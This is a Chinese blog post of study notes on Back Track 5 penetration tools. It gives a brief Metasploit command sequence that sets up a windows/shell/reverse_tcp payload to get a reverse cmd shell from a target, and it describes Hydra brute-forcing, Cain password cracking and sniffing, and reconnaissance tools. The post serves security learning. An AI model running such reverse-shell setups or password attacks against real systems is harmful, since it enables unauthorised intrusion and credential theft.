Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具-阿里云开发者社区

开发者社区> 老朱教授> 正文

Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具

简介:
+关注继续查看

网络漏洞攻击工具

  • Metasploit

  先msfupdate升级:

  然后选择msfconsole:

  接下来:

复制代码
set LHOST 本机IP地址

setLPORT 4445

setg PAYLOAD windows/shell/reverse_tcp

setg RHOST 目标IP地址

setg port 21

set target 随意数字

exploit
复制代码

 

这样就可以反弹一个cmd shell了。

密码破解

  • Hydra

多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,socks5,pcnfs,cisco等各类主流服务进行在线密码破解攻击尝试攻击。

字典破解,Protocol中有很多,主要是之前扫描出来的端口开放情况来进行的。

Windows下渗透工具介绍

  • maltegoCE

  DNS收集。

  • IBM Rational AppScan

  自动化web应用的安全漏洞评估工作,能扫描和检测所以常见的web应用安全漏洞,例如SQL注入、跨站点脚本攻击、缓冲区溢出以及最新的FLASH/FLEX应用和Web2.0应用暴露等方面安全漏洞扫描。

  • SmartWhois

  查找所以关于IP地址、主机名或者域名的可用信息,包括国家、州或省、沉城市、网络供应方、网络管理员和技术支持信息。

  • Sam Spade

  如果一个黑客想查询一个有域名的公司的某些信息,通常可以对该域名执行whois命令来找到附加信息。UNIX的大多数版本都装有whois,所以黑客只需要在终端窗口或者命令提示前输入“whois 要攻击的域名”就可以了。而对于windows的操作系统,要执行whois命令就需要一个第三方的工具:sam spade。

  • Cain

  可以破解屏保、PWL密码、共享密码、缓存口令、远程共享口令、SMB口令、支持VNC口令解码、Cisco Type-7口令解码、Base64口令解码、SQL Server 7.0/2000口令解码、Remote Desktop口令解码、Access Database口令解码、Cisco PIX Firewall口令解码、Cisco MD5解码、NTLM Session Security口令解码、IKE Aggressive Mode Pre-Shared Keys口令解码等综合工具,还可以远程破解,可以挂字典以及暴力破解,其sniffer功能极其强大,几乎可以明文捕获一切帐号口令,包括FTP、HTTP、IMAP、POP3、SMB、TELNET、VNC、TDS、SMTP、MSKERB5-PREAUTH、MSN、RADIUS-KEYS、RADIUS-USERS、ICQ、IKE Aggressive Mode Pre-Shared Keys authentications等

  • FOCA Free

  可以找出更多有关分析网站提供的任何文件的元数据。

  • Nessus

  前面讲到过。= =

  • Nmap – Zenmap GUI

  一个网络扫描程序,你还可以用它来看别人电脑在下载什么。

  • Metasploit

  Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

  • Firefox Portable

  火狐的插件。

 

 

  • 获取的知识

  再次感谢《back track 5 从入门到精通 ——渗透之道》这本书。

  这本书算是边学习边操作边记录边分享的完成了,但是BT5里面还有很多工具,以后我会主要分享里面很实用很实用的工具。

  希望学习完这本书能够BT5基本入个门,在打开每个工具的时候,都会有帮助,太棒了~~~其实可以直接看帮助的,但是全是英文,虽然我个人觉得我的英文还不错。

 

 




本文转自我爱物联网博客园博客,原文链接:http://www.cnblogs.com/yydcdut/p/3491302.html,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
dwz4j企业级Java Web快速开发框架(Mybatis + SpringMVC) + jUI整合应用
dwz4j企业级Java Web快速开发框架(Mybatis + SpringMVC) + jUI整合应用
3 0
为人到中年的90后带来安全感:周鸿祎发布家庭防火墙、智能音箱
手机之后,物联网设备成为了 360 在硬件上发力的重点。昨天,这家公司在北京举行了一场新品发布会,CEO 周鸿祎向人们展示了公司最新推出的几款智能设备,同时也对未来智能时代的发展方向给出了自己的见解。
3 0
jeesite应用实战(数据增删改查),认真读完后10分钟就能开发一个模块(2)
jeesite应用实战(数据增删改查),认真读完后10分钟就能开发一个模块
5 0
一个小技巧:批量获得指定网站的所有图片列表
一个小技巧:批量获得指定网站的所有图片列表
3 0
Eclipse 使用Maven 构建Web项目的最佳方式,我认为没有之一(1)
Eclipse 使用Maven 构建Web项目的最佳方式,我认为没有之一
3 0
Java版阿里云通信短信发送API接口实例(1)
Java版阿里云通信短信发送API接口实例(新)
3 0
ecs使用体验
这是一段时间以来使用ecs的体验
3 0
50倍变焦拍月球!华为P30:最强拍照手机正式发布,最高9500元
在 Mate 20 引入强大 AI 算力之后,华为把手机拍照能力提升到了前所未有的水平。在「不够硬」的苹果发布会十几个小时之后,华为 2019 年发布的第一款旗舰机 P30 系列刚刚在法国巴黎亮相。
4 0
SysML 2019提前看:神经网络安全性
自从对抗攻击(Adversarial Attack)在图像识别网络上被发现之后,神经网络的应用安全成了一个热议的话题。这里介绍 SysML 2019大会两篇有关神经网络安全性的论文。第一篇讨论对抗攻击在离散输入的泛化定义,并将其应用于文档处理的网络上,第二篇讨论对抗攻击和常用的网络压缩的关系。
4 0
+关注
3010
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
文娱运维技术
立即下载
《SaaS模式云原生数据仓库应用场景实践》
立即下载
《看见新力量:二》电子书
立即下载